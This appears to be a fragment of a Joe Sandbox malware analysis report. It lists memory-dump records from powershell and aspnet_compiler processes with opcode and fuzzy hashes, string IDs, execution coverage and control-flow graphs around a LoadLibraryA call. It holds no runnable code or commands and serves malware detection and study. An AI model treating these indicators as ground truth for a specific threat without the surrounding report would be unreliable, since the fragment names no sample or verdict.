                                                                      • Source File: 0000000A.00000002.951524375.00007FF9ECF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9ECF50000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_7ff9ecf50000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: x,QK$gRK
                                                                      • API String ID: 0-4004359611
                                                                      • Opcode ID: 9dc8b91d5023c9923046e762f3a713f660c41bfc9aeaeff1a7f3de4cbee01dc5
                                                                      • Instruction ID: f1cadd34c2a7b62d899663e25abd62b4073ead562025ab46b1cd3086246b15be
                                                                      • Opcode Fuzzy Hash: 9dc8b91d5023c9923046e762f3a713f660c41bfc9aeaeff1a7f3de4cbee01dc5
                                                                      • Instruction Fuzzy Hash: 6B11D571B0DB0A4FEB9CDA2D64153B977D2EF85211B04417ED18EC36A2CE39FC0A8201
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.951270502.00007FF9ECE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9ECE80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_7ff9ece80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: pE
                                                                      • API String ID: 0-2896841053
                                                                      • Opcode ID: b86aa52a720e489411fd90a9cc34ddd83d08fa43cb2feff1067189bfa475b63f
                                                                      • Instruction ID: fa309413e29fe9ba16e8be4bbbaac0232467b2bbb2022c942e0840d31ca8d196
                                                                      • Opcode Fuzzy Hash: b86aa52a720e489411fd90a9cc34ddd83d08fa43cb2feff1067189bfa475b63f
                                                                      • Instruction Fuzzy Hash: 0241C93190E7895FD766DF7888656D97FF0EF16360F0802EEC489E7162DA285C46CB11
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.951270502.00007FF9ECE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9ECE80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_7ff9ece80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: `_^
                                                                      • API String ID: 0-3531142974
                                                                      • Opcode ID: 8168cde06f49f0497f33ea595a80cb91b93c716b0c9146402325528ca1f2a81d
                                                                      • Instruction ID: 1d0c2642769fa4cf0292c777219b09487c4eda35b55b1a13e5604a1d65c9663b
                                                                      • Opcode Fuzzy Hash: 8168cde06f49f0497f33ea595a80cb91b93c716b0c9146402325528ca1f2a81d
                                                                      • Instruction Fuzzy Hash: 1201F93380D6665AF713AB28B85A2D53F94FF52324B0C4277D1CCDA0D3DE98A949C292
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.951524375.00007FF9ECF50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9ECF50000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_7ff9ecf50000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: jtJ
                                                                      • API String ID: 0-2474859432
                                                                      • Opcode ID: 93eb5f3617c59b3445f37b8adb9e7dba2b71d5e25251bcaf98d2777c772874f5
                                                                      • Instruction ID: bec134f0bfb1aa06d05b2f3090588f21989c8fb45662121540ce21f0c473006c
                                                                      • Opcode Fuzzy Hash: 93eb5f3617c59b3445f37b8adb9e7dba2b71d5e25251bcaf98d2777c772874f5
                                                                      • Instruction Fuzzy Hash: BAF0F632F0CF5A4BF2A5D29C64493F4B7C1DF493A1B44467AC68DD31A2DD55FC228286
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.951270502.00007FF9ECE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9ECE80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_7ff9ece80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a2f0322417203079c952e9268bcaa8557180c8cef10aaac67e2605f43eb5a076
                                                                      • Instruction ID: 190adbaea40115864e9ac674aeb2d0d4be90266a866bb1b1e0035d299c209503
                                                                      • Opcode Fuzzy Hash: a2f0322417203079c952e9268bcaa8557180c8cef10aaac67e2605f43eb5a076
                                                                      • Instruction Fuzzy Hash: 4322E431A0CA498FEB49EF18D495BA97BE1FFA9310F14416ED48DD7292CA64FC41CB81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.951270502.00007FF9ECE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9ECE80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_7ff9ece80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e1f63687edb8b4ce0f309f2778745ed21318683ff09d7b653164a34fc3f6ff87
                                                                      • Instruction ID: c31a36539908edc45ee7c89a62350daec0c979707855088d9a46e40b11db09d1
                                                                      • Opcode Fuzzy Hash: e1f63687edb8b4ce0f309f2778745ed21318683ff09d7b653164a34fc3f6ff87
                                                                      • Instruction Fuzzy Hash: 2FF1B231A0CA498FDB89EF18D455BA97BE1FF69300F18416AD48DE7296CA74FC41CB81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.951270502.00007FF9ECE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9ECE80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_7ff9ece80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 55881b13b004a3cc22b3ee2e1cc44870c4faca330ff65f7cd2233cf370161dc1
                                                                      • Instruction ID: 00ea21a1557d55e86ff68cf6804adb00e58c659c319e0b4d37842ca538884e2e
                                                                      • Opcode Fuzzy Hash: 55881b13b004a3cc22b3ee2e1cc44870c4faca330ff65f7cd2233cf370161dc1
                                                                      • Instruction Fuzzy Hash: E081F73190D649AFE766DB7494557A87BF0EF56310F0401FEC48AF71A2DA682C85CB12
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.951270502.00007FF9ECE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9ECE80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_7ff9ece80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 677b862e986368ba40192338d13627643528256210d6b700b71bcd09ce8ccd5f
                                                                      • Instruction ID: 8c02ce39c671572c3f4c44b7dfd9f9f7be3eeb49a06125bd0abbe2a5ecce2bd0
                                                                      • Opcode Fuzzy Hash: 677b862e986368ba40192338d13627643528256210d6b700b71bcd09ce8ccd5f
                                                                      • Instruction Fuzzy Hash: 3E510E3290CA895FD305DB18E8557A5B7E1FF85310F08867FE0CDE71A2CA68AD45C792
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.951270502.00007FF9ECE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9ECE80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_7ff9ece80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 40a62b97633cfad6bf472e3477740bb90e43286dfe85cb6f4a5b19ac41ae69fd
                                                                      • Instruction ID: 3784215528a618194c401b5b501bdc40a783434fd976670f805e951f2a575d28
                                                                      • Opcode Fuzzy Hash: 40a62b97633cfad6bf472e3477740bb90e43286dfe85cb6f4a5b19ac41ae69fd
                                                                      • Instruction Fuzzy Hash: E331E230918A5D8FDB89EF98D894BEDBBB1FF58300F50016AD44DE32A1CB75A840CB41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.951270502.00007FF9ECE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9ECE80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_7ff9ece80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f8e6cc4818c579a651538ce827a25650e69ed5743106400854d8a5740f23e09b
                                                                      • Instruction ID: fcc30f4be0181c231b5efefd63016ee392ca1fae8fe0126413cb45312ad65592
                                                                      • Opcode Fuzzy Hash: f8e6cc4818c579a651538ce827a25650e69ed5743106400854d8a5740f23e09b
                                                                      • Instruction Fuzzy Hash: 4F21C43155CA498FD74AEF18D0917BAB7E0FF95314F14057EE0CEC71A2EA66A842C742
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.951270502.00007FF9ECE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9ECE80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_7ff9ece80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 59bdbad4123b45fc8a86d3c0009b6d170ef719828bcb7247d53a21117a409c60
                                                                      • Instruction ID: bfada7b33c9a33d9d1124a32cccb43a682ad023056861f88094fca21c432fe18
                                                                      • Opcode Fuzzy Hash: 59bdbad4123b45fc8a86d3c0009b6d170ef719828bcb7247d53a21117a409c60
                                                                      • Instruction Fuzzy Hash: C601093191CA188FDF55EF58D455EEC77A1FF69704F14015AE449E3295CA24EC81CBC1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.951270502.00007FF9ECE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9ECE80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_7ff9ece80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 693bc907555d98ddb91d67396b8d8ecc451c0a5e59ad690f94f6ffab59a7b95c
                                                                      • Instruction ID: bba1a1976a8dc73fdf41b2aa2ed2e97cd5712cf2a1460b11aa30d5b464c96ab4
                                                                      • Opcode Fuzzy Hash: 693bc907555d98ddb91d67396b8d8ecc451c0a5e59ad690f94f6ffab59a7b95c
                                                                      • Instruction Fuzzy Hash: 48F0303271CB444FDB58EA1CE45197973D1EB95335B10462EF08BC26A6DA26E8428646
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.951270502.00007FF9ECE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9ECE80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_7ff9ece80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7b34e3b826307b08125d79c58918529440ae302a9f0a0984f56dd4bed3e0f9ce
                                                                      • Instruction ID: 76fa1319cbe41246c651e1eb34b8bf1d9c26ded23021bf4cac423ed253514c21
                                                                      • Opcode Fuzzy Hash: 7b34e3b826307b08125d79c58918529440ae302a9f0a0984f56dd4bed3e0f9ce
                                                                      • Instruction Fuzzy Hash: 2DF0303276C6044F9B4CAA0CF8529B573D1E78A324B40416EE4CEC26A6E916FC428686
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.951270502.00007FF9ECE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9ECE80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_7ff9ece80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 197514edf54a452ff3233a2a02cef00cfd4fe3b50a587601a74fa1aa40f41922
                                                                      • Instruction ID: ae1df19120769e3ae2d29ead6faf4f66ca6610d775292f2475ca45eed7684d37
                                                                      • Opcode Fuzzy Hash: 197514edf54a452ff3233a2a02cef00cfd4fe3b50a587601a74fa1aa40f41922
                                                                      • Instruction Fuzzy Hash: 4AD0173190D61AAEE76A9660142A3B83690AF15310F0401BEC18AF76D1DEAC7C469722
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.951270502.00007FF9ECE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9ECE80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_7ff9ece80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8213d0183aedbb160992a1ad7f43016f420978b8daa5fbd25e0d5c4023fa930f
                                                                      • Instruction ID: e1c5dd5fe45d3c1ccf7ffed7428181a4999d0eda2b9d304ddb85e1802c6ab21d
                                                                      • Opcode Fuzzy Hash: 8213d0183aedbb160992a1ad7f43016f420978b8daa5fbd25e0d5c4023fa930f
                                                                      • Instruction Fuzzy Hash: F7D0A73080E649AFD3539B74442D7987AD0AF10310F0801FE808DEB1A3DE682846CB23
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.951270502.00007FF9ECE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9ECE80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_7ff9ece80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: `9$`9$9$`_I$`_^
                                                                      • API String ID: 0-2323841811
                                                                      • Opcode ID: 655afade25e7ba27151da44c40bc8a34793da608d1fa61fb9a9bb0e497755197
                                                                      • Instruction ID: d3092e84383e6c1889cafb8a8171ee58ad85924da7cdc63e258783a067a7f83a
                                                                      • Opcode Fuzzy Hash: 655afade25e7ba27151da44c40bc8a34793da608d1fa61fb9a9bb0e497755197
                                                                      • Instruction Fuzzy Hash: 3A413657D4F6C22BF2539B2828953657F50BF5276071C41FFC0D8AA197AC9CAD098363
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.951270502.00007FF9ECE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF9ECE80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_10_2_7ff9ece80000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: `9$`9$9$`_I$`_^
                                                                      • API String ID: 0-2323841811
                                                                      • Opcode ID: 4b0dc382bd6e421925b24478f53c20388cdc6174a084803f2cfe202a81c0ea10
                                                                      • Instruction ID: 3d4308c5f9381de7fee73f92810aca5ea25107dd22acc62d81afd15fa64246e8
                                                                      • Opcode Fuzzy Hash: 4b0dc382bd6e421925b24478f53c20388cdc6174a084803f2cfe202a81c0ea10
                                                                      • Instruction Fuzzy Hash: A7314157D4F6C22FF3439B2828953647F90AF5266071C40FFC0D8AA197AC9CAD098363
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Execution Graph

                                                                      Execution Coverage:15.4%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:6
                                                                      Total number of Limit Nodes:0
                                                                      execution_graph 11593 1482cb0 11594 1482cce 11593->11594 11597 148288c 11594->11597 11596 1482d05 11599 14847d0 LoadLibraryA 11597->11599 11600 14848c9 11599->11600

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 94 14847c4-1484827 96 1484829-148484e 94->96 97 148487b-14848c7 LoadLibraryA 94->97 96->97 102 1484850-1484852 96->102 100 14848c9-14848cf 97->100 101 14848d0-1484901 97->101 100->101 109 1484911 101->109 110 1484903-1484907 101->110 103 1484854-148485e 102->103 104 1484875-1484878 102->104 106 1484860 103->106 107 1484862-1484871 103->107 104->97 106->107 107->107 111 1484873 107->111 113 1484912 109->113 110->109 112 1484909 110->112 111->104 112->109 113->113
                                                                      APIs
                                                                      • LoadLibraryA.KERNELBASE(?), ref: 014848B7
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.942874235.0000000001480000.00000040.00000800.00020000.00000000.sdmp, Offset: 01480000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_1480000_aspnet_compiler.jbxd
                                                                      Similarity
                                                                      • API ID: LibraryLoad
                                                                      • String ID:
                                                                      • API String ID: 1029625771-0
                                                                      • Opcode ID: 7aba8f98e0f1fe826b6284fab6d467d7bfc72258455696224a05e3a19ee97cce
                                                                      • Instruction ID: 6afdcf59abf1943c2e61b6580e0c675df144f93719f40a796281875cc8f34e29
                                                                      • Opcode Fuzzy Hash: 7aba8f98e0f1fe826b6284fab6d467d7bfc72258455696224a05e3a19ee97cce
                                                                      • Instruction Fuzzy Hash: 6E416674D102499FDB10DFA9D98579EBBF1FB48318F18802AE814AB790D7749446CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 114 148288c-1484827 116 1484829-148484e 114->116 117 148487b-14848c7 LoadLibraryA 114->117 116->117 122 1484850-1484852 116->122 120 14848c9-14848cf 117->120 121 14848d0-1484901 117->121 120->121 129 1484911 121->129 130 1484903-1484907 121->130 123 1484854-148485e 122->123 124 1484875-1484878 122->124 126 1484860 123->126 127 1484862-1484871 123->127 124->117 126->127 127->127 131 1484873 127->131 133 1484912 129->133 130->129 132 1484909 130->132 131->124 132->129 133->133
                                                                      APIs
                                                                      • LoadLibraryA.KERNELBASE(?), ref: 014848B7
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.942874235.0000000001480000.00000040.00000800.00020000.00000000.sdmp, Offset: 01480000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_1480000_aspnet_compiler.jbxd
                                                                      Similarity
                                                                      • API ID: LibraryLoad
                                                                      • String ID:
                                                                      • API String ID: 1029625771-0
                                                                      • Opcode ID: 4e6ebd735226a52af06d9727cbc27951a1b24af74cdf5e124afa28fa4fa9f0a3
                                                                      • Instruction ID: 38e0f1e3b41ff1c90fbc8eae94f3a1da616a47a29eb913c7740cc692664eba92
                                                                      • Opcode Fuzzy Hash: 4e6ebd735226a52af06d9727cbc27951a1b24af74cdf5e124afa28fa4fa9f0a3
                                                                      • Instruction Fuzzy Hash: 10416770D103499FDB10EFA9D98479EBBF1FB48318F18802AE815AB790D7749845CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%